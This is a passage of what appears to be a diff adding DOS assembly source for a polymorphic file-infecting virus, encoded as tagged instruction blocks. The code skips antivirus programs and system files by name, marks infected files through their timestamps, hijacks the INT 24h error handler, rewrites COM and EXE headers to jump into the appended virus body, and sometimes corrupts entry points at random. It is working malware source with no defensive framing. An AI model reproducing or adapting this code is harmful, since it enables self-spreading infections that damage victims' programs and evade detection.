+ dw 0fbh ; Pointer to infect_exit_
+ db 11101111b ; End of block
+examine_ext db 11101110b ; Beginning of block
+ dw 0f0h ; Block identification of examine_ext
+ db 01h ; One byte instruction
+
+ lodsw ; AX = two bytes of filename
+
+ db 03h ; Three bytes instruction
+
+ or ax,2020h ; Lowercase characters
+
+ db 02h ; Two bytes instruction
+
+ cmp ax,bx ; COM or EXE executable?
+
+ db 01110101b+10000000b ; Not equal? Jump to examine_ext
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ sub si,04h ; SI = offset of the dot in the fi...
+
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 1398h ; Pointer to find_name
+ db 11101111b ; End of block
+find_name db 11101110b ; Beginning of block
+ dw 1398h ; Block identification of find_name
+ db 01h ; One byte instruction
+
+ dec si ; SI = offset within filename
+
+ db 02h ; Two bytes instruction
+
+ mov al,[si] ; AL = byte of filename
+
+ db 02h ; Two bytes instruction
+
+ cmp al,'/' ; Beginning of filename?
+
+ db 01110100b+10000000b ; Equal? Jump to examine_name
+ dw 1397h ; Pointer to examine_name
+ db 02h ; Two bytes instruction
+
+ cmp al,'\' ; Beginning of filename?
+
+ db 01110100b+10000000b ; Equal? Jump to examine_name
+ dw 1397h ; Pointer to examine_name
+ db 02h ; Two bytes instruction
+
+ cmp al,':' ; Beginning of filename?
+
+ db 01110100b+10000000b ; Equal? Jump to examine_name
+ dw 1397h ; Pointer to examine_name
+ db 02h ; Two bytes instruction
+
+ cmp si,dx ; Beginning of filename?
+
+ db 01110111b+10000000b ; Above? Jump to find_name
+ dw 1398h ; Pointer to find_name
+ db 01h ; One byte instruction
+
+ dec si ; SI = offset within filename
+
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 1397h ; Pointer to examine_name
+ db 11101111b ; End of block
+examine_name db 11101110b ; Beginning of block
+ dw 1397h ; Block identification of examine_...
+ db 01h ; One byte instruction
+
+ inc si ; SI = offset of beginning of file...
+
+ db 01h ; One byte instruction
+
+ lodsw ; AX = two bytes of filename
+
+ db 03h ; Three bytes instruction
+
+ or ax,2020h ; Lowercase characters
+
+ db 03h ; Three bytes instruction
+
+ xor ax,0aa55h ; Encrypt two bytes of filename
+
+ db 03h ; Three bytes instruction
+
+ cmp ax,('ci' xor 0aa55h)
+
+ db 01110100b+10000000b ; Equal? Jump to infect_exit_
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('on' xor 0aa55h)
+
+ db 01110100b+10000000b ; NOD-iCE? Jump to infect_exit_
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('ew' xor 0aa55h)
+
+ db 01110100b+10000000b ; Dr. Web? Jump to infect_exit_
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('bt' xor 0aa55h)
+
+ db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to ...
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('va' xor 0aa55h)
+
+ db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to i...
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('-f' xor 0aa55h)
+
+ db 01110100b+10000000b ; F-PROT? Jump to infect_exit_
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('cs' xor 0aa55h)
+
+ db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_...
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('lc' xor 0aa55h)
+
+ db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_...
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('oc' xor 0aa55h)
+
+ db 01110100b+10000000b ; COMMAND.COM? Jump to infect_exit_
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('iw' xor 0aa55h)
+
+ db 01110100b+10000000b ; WIN.COM?
Jump to infect_exit_
+ dw 0fbh ; Pointer to infect_exit_
+ db 03h ; Three bytes instruction
+
+ cmp ax,('rk' xor 0aa55h)
+
+ db 01110100b+10000000b ; Equal? Jump to infect_exit_
+ dw 0fbh ; Pointer to infect_exit_
+ db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 13a4h ; Pointer to int24_store
+ db 03h ; Three bytes instruction
+
+ mov ax,3d02h ; Open file (read/write)
+
+ db 01h ; One byte instruction
+
+ pushf ; Save flags at stack
+
+ db 05h ; Five bytes instruction
+
+ call dword ptr cs:[1234h]
+
+ db 11101101b ; Data reference
+ dw 0c9h ; Pointer to int21_addr
+ db 01110010b+10000000b ; Error? Jump to terminate_
+ dw 1771h ; Pointer to infect_exit
+ db 02h ; Two bytes instruction
+
+ mov bx,ax ; BX = file handle
+
+ db 02h ; Two bytes instruction
+
+ xor ax,ax ; Zero AX
+
+ db 02h ; Two bytes instruction
+
+ mov ds,ax ; DS = segment of BIOS data segment
+
+ db 04h ; Four bytes instruction
+
+ mov si,ds:[46dh] ; SI = timer ticks since midnight
+
+ db 01h ; One byte instruction
+
+ push cs ; Save CS at stack
+
+ db 01h ; One byte instruction
+
+ push cs ; Save CS at stack
+
+ db 01h ; One byte instruction
+
+ pop ds ; Load DS from stack (CS)
+
+ db 01h ; One byte instruction
+
+ pop es ; Load ES from stack (CS)
+
+ db 03h ; Three bytes instruction
+
+ mov ax,5700h ; Get file's date and time
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 01110010b+10000000b ; Error? Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 04h ; Four bytes instruction
+
+ mov ds:[1234h],dx ; Store file's date
+
+ db 11101101b ; Data reference
+ dw 12dh ; Pointer to file_date
+ db 02h ; Two bytes instruction
+
+ mov al,cl ; AL = low-order byte of file time
+
+ db 02h ; Two bytes instruction
+
+ and al,00011111b ; AL = file seconds
+
+ db 02h ; Two bytes instruction
+
+ cmp al,00000100b ; Already infected (8 seconds)?
+
+ db 01110100b+10000000b ; Equal?
Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 03h ; Three bytes instruction
+
+ and cl,11100000b ; Zero file seconds
+
+ db 03h ; Three bytes instruction
+
+ or cl,00000100b ; Set infection mark (8 seconds)
+
+ db 04h ; Four bytes instruction
+
+ mov ds:[1234h],cx ; Store file's time
+
+ db 11101101b ; Data reference
+ dw 12ch ; Pointer to file_time
+ db 03h ; Three bytes instruction
+
+ and si,1111111111110000b
+
+ db 04h ; Four bytes instruction
+
+ cmp ds:[1234h],si ; Infect file?
+
+ db 11101101b ; Data reference
+ dw 13adh ; Pointer to timer_ticks
+ db 01110100b+10000000b ; Equal? Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 04h ; Four bytes instruction
+
+ mov ds:[1234h],si ; Store timer ticks since midnight
+
+ db 11101101b ; Data reference
+ dw 13adh ; Pointer to timer_ticks
+ db 02h ; Two bytes instruction
+
+ mov ah,3fh ; Read from file
+
+ db 03h ; Three bytes instruction
+
+ mov cx,18h ; Read twenty-four bytes
+
+ db 03h ; Three bytes instruction
+
+ mov dx,1234h ; DX = offset of exe_header
+
+ db 11101101b ; Data reference
+ dw 138fh ; Pointer to exe_header
+ db 02h ; Two bytes instruction
+
+ mov si,dx ; SI = offset of exe_header
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 01110010b+10000000b ; Error? Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 03h ; Three bytes instruction
+
+ mov ax,4202h ; Set current file position (EOF)
+
+ db 01h ; One byte instruction
+
+ cwd ; DX = high-order word of offset f...
+
+ db 02h ; Two bytes instruction
+
+ xor cx,cx ; CX = high-order word of offset f...
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 06h ; Six bytes instruction
+
+ mov ds:[00h],0010111010001101b
+
+
+ db 04h ; Four bytes instruction
+
+ cmp [si],'ZM' ; EXE signature?
+
+ db 01110100b+10000000b ; Equal? Jump to infect_exe
+ dw 138dh ; Pointer to infect_exe
+ db 04h ; Four bytes instruction
+
+ cmp [si],'MZ' ; EXE signature?
+
+ db 01110100b+10000000b ; Equal?
Jump to infect_exe
+ dw 138dh ; Pointer to infect_exe
+ db 04h ; Four bytes instruction
+
+ mov ds:[1234h],cl ; Store executable status
+
+ db 11101101b ; Data reference
+ dw 1388h ; Pointer to executa_sta
+ db 03h ; Three bytes instruction
+
+ cmp ax,0bb8h ; Too small in filesize?
+
+ db 01110010b+10000000b ; Below? Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 03h ; Three bytes instruction
+
+ cmp ax,0dea8h ; Too large in filesize?
+
+ db 01110111b+10000000b ; Above? Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 01h ; One byte instruction
+
+ push si ; Save SI at stack
+
+ db 03h ; Three bytes instruction
+
+ mov di,1234h ; DI = offset of exe_header
+
+ db 11101101b ; Data reference
+ dw 138fh ; Pointer to exe_header
+ db 02h ; Two bytes instruction
+
+ mov cl,[di] ; CL = first byte of original code...
+
+ db 03h ; Three bytes instruction
+
+ mov byte ptr [di],11101001b
+
+ db 01h ; One byte instruction
+
+ inc di ; DI = offset within exe_header
+
+ db 04h ; Four bytes instruction
+
+ mov ds:[1234h],cl ; Store first byte of original cod...
+
+ db 11101101b ; Data reference
+ dw 1f40h ; Pointer to origin_code_
+ db 04h ; Four bytes instruction
+
+ mov ds:[1234h],cl ; Store first byte of original cod...
+
+ db 11101101b ; Data reference
+ dw 1776h ; Pointer to incorr_code_
+ db 02h ; Two bytes instruction
+
+ mov cx,[di] ; CX = word of original code of in...
+
+ db 03h ; Three bytes instruction
+
+ mov si,1234h ; SI = offset of origin_code_
+
+ db 11101101b ; Data reference
+ dw 1f40h ; Pointer to origin_code_
+ db 03h ; Three bytes instruction
+
+ mov [si+01h],cx ; Store word of original code of i...
+
+ db 03h ; Three bytes instruction
+
+ sub ax,03h ; AX = offset of virus within infe...
+
+ db 01h ; One byte instruction
+
+ stosw ; Store offset of virus within inf...
+
+ db 03h ; Three bytes instruction
+
+ mov ax,14h ; AX = probability of storing inco...
+
+ db 04h ; Four bytes instruction
+
+ cmp ds:[1234h],ax ; Store incorrect IP?
+
+ db 11101101b ; Data reference
+ dw 0bech ; Pointer to probability_
+ db 01110111b+10000000b ; Above? Jump to write_virus
+ dw 13afh ; Pointer to dont_corrupt
+ db 03h ; Three bytes instruction
+
+ mov bp,10h ; Random number within sixteen
+
+ db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0bd5h ; Pointer to rnd_in_rang
+ db 03h ; Three bytes instruction
+
+ sub ax,08h ; Subtract eight from random number
+
+ db 02h ; Two bytes instruction
+
+ add cx,ax ; Add random number to word of ori...
+
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 13afh ; Pointer to dont_corrupt
+ db 11101111b ; End of block
+dont_corrupt db 11101110b ; Beginning of block
+ dw 13afh ; Block identification of dont_cor...
+ db 03h ; Three bytes instruction
+
+ mov si,1234h ; SI = offset of incorr_code_
+
+ db 11101101b ; Data reference
+ dw 1776h ; Pointer to incorr_code_
+ db 03h ; Three bytes instruction
+
+ mov [si+01h],cx ; Store word of original code of i...
+
+ db 01h ; One byte instruction
+
+ pop si ; Load SI from stack
+
+ db 03h ; Three bytes instruction
+
+ mov ax,0fff0h ; AX = initial CS and SS relative ...
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial CS relative to sta...
+
+ db 11101101b ; Data reference
+ dw 1389h ; Pointer to initial_cs_
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial SS relative to sta...
+
+ db 11101101b ; Data reference
+ dw 138ah ; Pointer to initial_ss_
+ db 03h ; Three bytes instruction
+
+ mov ax,100h ; AX = initial IP
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial IP
+
+ db 11101101b ; Data reference
+ dw 138bh ; Pointer to initial IP
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial IP
+
+ db 11101101b ; Data reference
+ dw 1773h ; Pointer to incorrec_ip
+ db 03h ; Three bytes instruction
+
+ mov ax,0fffeh ; AX = initial SP
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial SP
+
+ db 11101101b ; Data reference
+ dw 138ch ; Pointer to initial_sp_
+ db 01h ; One byte instruction
+
+ inc ax ; Increase size of memory block in...
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store size of memory block in pa...
+
+ db 11101101b ; Data reference
+ dw 1395h ; Pointer to mcb_size__
+ db 03h ; Three bytes instruction
+
+ mov ax,1000h ; AX = new size in paragraphs
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store new size in paragraphs
+
+ db 11101101b ; Data reference
+ dw 1393h ; Pointer to new_mcb_siz
+ db 03h ; Three bytes instruction
+
+ mov ax,4202h ; Set current file position (EOF)
+
+ db 01h ; One byte instruction
+
+ cwd ; DX = low-order word of offset f...
+
+ db 02h ; Two bytes instruction
+
+ xor cx,cx ; CX = high-order word of offset f...
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 03h ; Three bytes instruction
+
+ add ax,100h ; AX = delta offset
+
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 138eh ; Pointer to write_virus
+ db 11101111b ; End of block
+write_virus db 11101110b ; Beginning of block
+ dw 138eh ; Block identification of write_virus
+ db 03h ; Three bytes instruction
+
+ mov ds:[02h],ax ; Store delta offset
+
+ db 02h ; Two bytes instruction
+
+ mov ah,40h ; Write to file
+
+ db 01h ; Two bytes instruction
+
+ cwd ; Zero DX
+
+ db 03h ; Three bytes instruction
+
+ mov cx,1234h ; CX = length of virus
+
+ db 11101101b ; Data reference
+ dw 66h ; Pointer to virus_end
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 01110010b+10000000b ; Error? Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 03h ; Three bytes instruction
+
+ mov ax,4200h ; Set current file position (SOF)
+
+ db 01h ; One byte instruction
+
+ cwd ; DX = low-order word of offset f...
+
+ db 02h ; Two bytes instruction
+
+ xor cx,cx ; CX = high-order word of offset f...
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 02h ; Two bytes instruction
+
+ mov ah,40h ; Write to file
+
+ db 02h ; Two bytes instruction
+
+ mov dx,si ; DX = offset of exe_header
+
+ db 03h ; Three bytes instruction
+
+ mov cx,18h ; Write twenty-four bytes
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 01110010b+10000000b ; Error?
Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 03h ; Three bytes instruction
+
+ mov ax,5701h ; Set file's date and time
+
+ db 04h ; Four bytes instruction
+
+ mov cx,ds:[1234h] ; CX = new time
+
+ db 11101101b ; Data reference
+ dw 12ch ; Pointer to file_time
+ db 04h ; Four bytes instruction
+
+ mov dx,ds:[1234h] ; DX = new date
+
+ db 11101101b ; Data reference
+ dw 12dh ; Pointer to file_date
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0fah ; Pointer to close_file
+ db 11101111b ; End of block
+close_file db 11101110b ; Beginning of block
+ dw 0fah ; Block identification of close_file
+ db 02h ; Two bytes instruction
+
+ mov ah,3eh ; Close file
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 1771h ; Pointer to infect_exit
+ db 11101111b ; End of block
+infect_exit db 11101110b ; Beginning of block
+ dw 1771h ; Block identification of infect_exit
+ db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 13a5h ; Pointer to int24_load
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 0fbh ; Pointer to infect_exit_
+ db 11101111b ; End of block
+infect_exit_ db 11101110b ; Beginning of block
+ dw 0fbh ; Block identification of infect_e...
+ db 01h ; One byte instruction
+
+ ret ; Return
+
+ db 11101111b ; End of block
+infect_exe db 11101110b ; Beginning of block
+ dw 138dh ; Block identification of infect_exe
+ db 01h ; One byte instruction
+
+ inc cx ; EXE executable
+
+ db 04h ; Four bytes instruction
+
+ mov ds:[1234h],cl ; Store executable status
+
+ db 11101101b ; Data reference
+ dw 1388h ; Pointer to executa_sta
+ db 02h ; Two bytes instruction
+
+ or dx,dx ; Too small in filesize?
+
+ db 01110101b+10000000b ; Not zero? Jump to exam_filesiz
+ dw 13aeh ; Pointer to exam_filesiz
+ db 03h ; Three bytes instruction
+
+ cmp ax,2710h ; Too small in filesize?
+
+ db 01110010b+10000000b ; Below?
Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 13aeh ; Pointer to exam_filesiz
+ db 11101111b ; End of block
+exam_filesiz db 11101110b ; Beginning of block
+ dw 13aeh ; Block identification of exam_fil...
+ db 03h ; Three bytes instruction
+
+ cmp dx,06h ; Too large in filesize?
+
+ db 01110111b+10000000b ; Above? Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 01h ; One byte instruction
+
+ push ax ; Save AX at stack
+
+ db 01h ; One byte instruction
+
+ push dx ; Save DX at stack
+
+ db 03h ; Three bytes instruction
+
+ mov cx,200h ; Divide by pages
+
+ db 02h ; Two bytes instruction
+
+ div cx ; DX:AX = filesize in pages
+
+ db 01h ; One byte instruction
+
+ inc ax ; Increase total number of 512-byt...
+
+ db 03h ; Three bytes instruction
+
+ cmp [si+04h],ax ; Internal overlay?
+
+ db 01h ; One byte instruction
+
+ pop dx ; Load DX from stack
+
+ db 01h ; One byte instruction
+
+ pop ax ; Load AX from stack
+
+ db 01110101b+10000000b ; Not equal? Jump to close_file
+ dw 0fah ; Pointer to close_file
+ db 01h ; One byte instruction
+
+ push ax ; Save AX at stack
+
+ db 01h ; One byte instruction
+
+ push dx ; Save DX at stack
+
+ db 02h ; Two bytes instruction
+
+ xor ax,ax ; Zero AX
+
+ db 04h ; Four bytes instruction
+
+ cmp [si+0ch],0ffffh ; Maximum paragraphs to allocate ...?
+
+ db 01110100b+10000000b ; Equal? Jump to maximum_mem
+ dw 1399h ; Pointer to maximum_mem
+ db 03h ; Three bytes instruction
+
+ mov ax,[si+04h] ; AX = total number of 512-byte pa...
+
+ db 01h ; One byte instruction
+
+ inc ax ; Increase total number of 512-byt...
+
+ db 02h ; Two bytes instruction
+
+ mov cl,05h ; Divide by thirty-two
+
+ db 02h ; Two bytes instruction
+
+ shl ax,cl ; AX = total number of 512-byte pa...
+
+ db 03h ; Three bytes instruction
+
+ sub ax,[si+08h] ; Subtract header size in paragrap...
+
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 1399h ; Pointer to maximum_mem
+ db 11101111b ; End of block
+maximum_mem db 11101110b ; Beginning of block
+ dw 1399h ; Block identification of maximum_mem
+ db 03h ; Three bytes instruction
+
+ add ax,[si+0ch] ; Add maximum paragraphs to alloca...
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store size of memory block in pa...
+
+ db 11101101b ; Data reference
+ dw 1395h ; Pointer to mcb_size__
+ db 03h ; Three bytes instruction
+
+ mov ax,[si+0eh] ; AX = initial SS relative to star...
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial SS relative to sta...
+
+ db 11101101b ; Data reference
+ dw 138ah ; Pointer to initial_ss_
+ db 03h ; Three bytes instruction
+
+ mov ax,[si+10h] ; AX = initial SP
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial SP
+
+ db 11101101b ; Data reference
+ dw 138ch ; Pointer to initial_sp_
+ db 03h ; Three bytes instruction
+
+ mov ax,[si+14h] ; AX = initial IP
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial IP
+
+ db 11101101b ; Data reference
+ dw 138bh ; Pointer to initial IP
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial IP
+
+ db 11101101b ; Data reference
+ dw 1773h ; Pointer to incorrec_ip
+ db 03h ; Three bytes instruction
+
+ mov ax,[si+16h] ; AX = initial CS relative to star...
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store initial CS relative to sta...
+
+ db 11101101b ; Data reference
+ dw 1389h ; Pointer to initial_cs_
+ db 01h ; One byte instruction
+
+ pop dx ; Load DX from stack
+
+ db 01h ; One byte instruction
+
+ pop ax ; Load AX from stack
+
+ db 01h ; One byte instruction
+
+ push ax ; Save AX at stack
+
+ db 01h ; One byte instruction
+
+ push dx ; Save DX at stack
+
+ db 05h ; Five bytes instruction
+
+ mov [si+0ch],0ffffh ; Store maximum paragraphs to allo...
+
+ db 05h ; Five bytes instruction
+
+ mov [si+10h],7ffeh ; Store initial SP
+
+ db 05h ; Five bytes instruction
+
+ mov word ptr [si+14h],00h
+
+ db 03h ; Three bytes instruction
+
+ mov cx,10h ; Divide by paragraphs
+
+ db 02h ; Two bytes instruction
+
+ div cx ; DX:AX = filesize in paragraphs
+
+ db 03h ; Three bytes instruction
+
+ sub ax,[si+08h] ; Subtract header size in paragrap...
+
+ db 01h ; One byte instruction
+
+ inc ax ; Increase initial CS/SS relative ...
+
+ db 03h ; Three bytes instruction
+
+ mov [si+0eh],ax ; Store initial SS relative to sta...
+
+ db 03h ; Three bytes instruction
+
+ mov [si+16h],ax ; Store initial CS relative to sta...
+
+ db 03h ; Three bytes instruction
+
+ mov ax,[si+04h] ; AX = total number of 512-byte pa...
+
+ db 01h ; One byte instruction
+
+ inc ax ; Increase total number of 512-byt...
+
+ db 02h ; Two bytes instruction
+
+ mov cl,05h ; Divide by thirty-two
+
+ db 02h ; Two bytes instruction
+
+ shl ax,cl ; AX = total number of 512-byte pa...
+
+ db 03h ; Three bytes instruction
+
+ sub ax,[si+08h] ; Subtract header size in paragrap...
+
+ db 03h ; Three bytes instruction
+
+ add ax,[si+0ah] ; Add maximum paragraphs to alloca...
+
+ db 02h ; Two bytes instruction
+
+ mov di,ax ; DI = minimum paragraphs to alloc...
+
+ db 01h ; One byte instruction
+
+ pop cx ; Load CX from stack (DX)
+
+ db 01h ; One byte instruction
+
+ pop dx ; Load DX from stack (AX)
+
+ db 03h ; Three bytes instruction
+
+ and dx,1111111111110000b
+
+ db 03h ; Three bytes instruction
+
+ add dx,10h ; DX = low-order word of offset fr...
+
+ db 03h ; Three bytes instruction
+
+ adc cx,00h ; CX = high-order word of offset f...
+
+ db 03h ; Three bytes instruction
+
+ mov ax,4200h ; Set current file position (SOF)
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 03h ; Three bytes instruction
+
+ add ax,1234h ; AX = length of virus
+
+ db 11101101b ; Data reference
+ dw 66h ; Pointer to virus_end
+ db 03h ; Three bytes instruction
+
+ adc dx,00h ; Convert to 32-bit
+
+ db 03h ; Three bytes instruction
+
+ mov cx,200h ; Divide by pages
+
+ db 02h ; Two bytes instruction
+
+ div cx ; DX:AX = filesize in pages
+
+ db 03h ; Three bytes instruction
+
+ mov [si+02h],dx ; Store number of bytes in last 51...
+
+ db 03h ; Three bytes instruction
+
+ add dx,0ffffh ; Add sixty-five thousand five hun...
+
+ db 03h ; Three bytes instruction
+
+ adc ax,00h ; Convert to 32-bit
+
+ db 03h ; Three bytes instruction
+
+ mov [si+04h],ax ; Store total number of 512-byte p...
+
+ db 05h ; Five bytes instruction
+
+ mov [si+0ah],800h ; Store minimum paragraphs of memo...
+
+ db 01h ; One byte instruction
+
+ inc ax ; Store total number of 512-byte p...
+
+ db 02h ; Two bytes instruction
+
+ mov cl,05h ; Divide by thirty-two
+
+ db 02h ; Two bytes instruction
+
+ shl ax,cl ; AX = total number of 512-byte pa...
+
+ db 03h ; Three bytes instruction
+
+ sub ax,[si+08h] ; Subtract header size in paragrap...
+
+ db 03h ; Three bytes instruction
+
+ add ax,[si+0ah] ; Add maximum paragraphs to alloca...
+
+ db 03h ; Three bytes instruction
+
+ mov ds:[1234h],ax ; Store new size in paragraphs
+
+ db 11101101b ; Data reference
+ dw 1393h ; Pointer to new_mcb_siz
+ db 02h ; Two bytes instruction
+
+ sub di,ax ; DI = additional minimum paragrap...
+
+ db 01110110b+10000000b ; Below or equal? Jump to dont_add...
+ dw 1396h ; Pointer to dont_add_mem
+ db 03h ; Three bytes instruction
+
+ add [si+0ah],di ; Add additional minimum paragraph...
+
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 1396h ; Pointer to dont_add_mem
+ db 11101111b ; End of block
+dont_add_mem db 11101110b ; Beginning of block
+ dw 1396h ; Block identification of dont_add...
+ db 03h ; Three bytes instruction
+
+ mov ax,14h ; AX = probability of storing inco...
+
+ db 04h ; Four bytes instruction
+
+ cmp ds:[1234h],ax ; Store incorrect IP?
+
+ db 11101101b ; Data reference
+ dw 0bech ; Pointer to probability_
+ db 03h ; Three bytes instruction
+
+ mov ax,00h ; ADD [BX+SI],AL (opcode 00h,00h)
+
+ db 01110111b+10000000b ; Above? Jump to write_virus
+ dw 138eh ; Pointer to write_virus
+ db 03h ; Three bytes instruction
+
+ mov bp,10h ; Random number within sixteen
+
+ db 11101000b ; CALL imm16 (opcode 0e8h)
+ dw 0bd5h ; Pointer to rnd_in_rang
+ db 02h ; Two bytes instruction
+
+ sub al,08h ; Subtract eight from random number
+
+ db 03h ; Three bytes instruction
+
+ mov di,1234h ; DI = offset of incorrec_ip
+
+ db 11101101b ; Data reference
+ dw 1773h ; Pointer to incorrec_ip
+ db 03h ; Three bytes instruction
+
+ add [di+01h],al ; Add random number to incorrect IP
+
+ db 06h ; Six bytes instruction
+
+ mov ds:[00h],1110110100110011b
+
+ db 03h ; Three bytes instruction
+
+ mov ax,1001000010010000b
+
+ db 11101001b ; JMP imm16 (opcode 0e9h)
+ dw 138eh ; Pointer to write_virus
+ db 11101111b ; End of block
+int24_virus db 11101110b ; Beginning of block
+ dw 1770h ; Block identification of int24_virus
+ db 02h ; Two bytes instruction
+
+ mov al,03h ; Fail system call in progress
+
+ db 01h ; One byte instruction
+
+ iret ; Interrupt return
+
+ db 11101111b ; End of block
+int24_store db 11101110b ; Beginning of block
+ dw 13a4h ; Block identification of int24_store
+ db 01h ; One byte instruction
+
+ push dx ; Save DX at stack
+
+ db 01h ; One byte instruction
+
+ push ds ; Save DS at stack
+
+ db 01h ; One byte instruction
+
+ push es ; Save ES at stack
+
+ db 01h ; One byte instruction
+
+ push cs ; Save CS at stack
+
+ db 01h ; One
byte instruction
+
+ pop ds ; Load DS from stack (CS)
+
+ db 03h ; Three bytes instruction
+
+ mov ax,3524h ; Get interrupt vector 24h
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 04h ; Four bytes instruction
+
+ mov ds:[1234h],es ; Store segment of interrupt 24h
+
+ db 11101101b ; Data reference
+ dw 13a2h ; Pointer to int24_seg
+ db 04h ; Four bytes instruction
+
+ mov ds:[1234h],bx ; Store offset of interrupt 24h
+
+ db 11101101b ; Data reference
+ dw 13a3h ; Pointer to int24_off
+ db 03h ; Three bytes instruction
+
+ mov dx,1234h ; DX = offset of int24_virus
+
+ db 11101101b ; Data reference
+ dw 1770h ; Pointer to int24_virus
+ db 03h ; Three bytes instruction
+
+ mov ax,2524h ; Set interrupt vector 24h
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 01h ; One byte instruction
+
+ pop es ; Load ES from stack
+
+ db 01h ; One byte instruction
+
+ pop ds ; Load DS from stack
+
+ db 01h ; One byte instruction
+
+ pop dx ; Load DX from stack
+
+ db 01h ; One byte instruction
+
+ ret ; Return
+
+ db 11101111b ; End of block
+int24_load db 11101110b ; Beginning of block
+ dw 13a5h ; Block identification of int24_load
+ db 01h ; One byte instruction
+
+ push ds ; Save DS at stack
+
+ db 05h ; Five bytes instruction
+
+ mov dx,cs:[1234h] ; DX = offset of interrupt 24h
+
+ db 11101101b ; Data reference
+ dw 13a3h ; Pointer to int24_off
+ db 05h ; Five bytes instruction
+
+ mov ds,cs:[1234h] ; DS = segment of interrupt 24h
+
+ db 11101101b ; Data reference
+ dw 13a2h ; Pointer to int24_seg
+ db 03h ; Three bytes instruction
+
+ mov ax,2524h ; Set interrupt vector 24h
+
+ db 02h ; Two bytes instruction
+
+ int 21h
+
+ db 01h ; One byte instruction
+
+ pop ds ; Load DS from stack
+
+ db 01h ; One byte instruction
+
+ ret ; Return
+
+ db 11101111b ; End of block
+push_regs db 11101110b ; Beginning of block
+ dw 13a0h ; Block identification of push_regs
+ db 05h ; Five bytes instruction
+
+ pop cs:[1234h] ; Load 16-bit immediate from stack
+
+ db 11101101b ;
Data reference
+ dw 13aah ; Pointer to imm16
+ db 01h ; One byte instruction
+
+ push ax ; Save AX at stack
+
+ db 01h ; One byte instruction
+
+ push bx ; Save BX at stack
+
+ db 01h ; One byte instruction
+
+ push cx ; Save CX at stack
+
+ db 01h ; One byte instruction
+
+ push dx ; Save DX at stack
+
+ db 01h ; One byte instruction
+
+ push si ; Save SI at stack
+
+ db 01h ; One byte instruction
+
+ push di ; Save DI at stack
+
+ db 01h ; One byte instruction
+
+ push bp ; Save BP at stack
+
+ db 01h ; One byte instruction
+
+ push ds ; Save DS at stack
+
+ db 01h ; One byte instruction
+
+ push es ; Save ES at stack
+
+ db 05h ; Five bytes instruction
+
+ jmp cs:[1234h]
+
+ db 11101101b ; Data reference
+ dw 13aah ; Pointer to imm16
+ db 11101111b ; End of block
+pop_regs db 11101110b ; Beginning of block
+ dw 13a1h ; Block identification of pop_regs
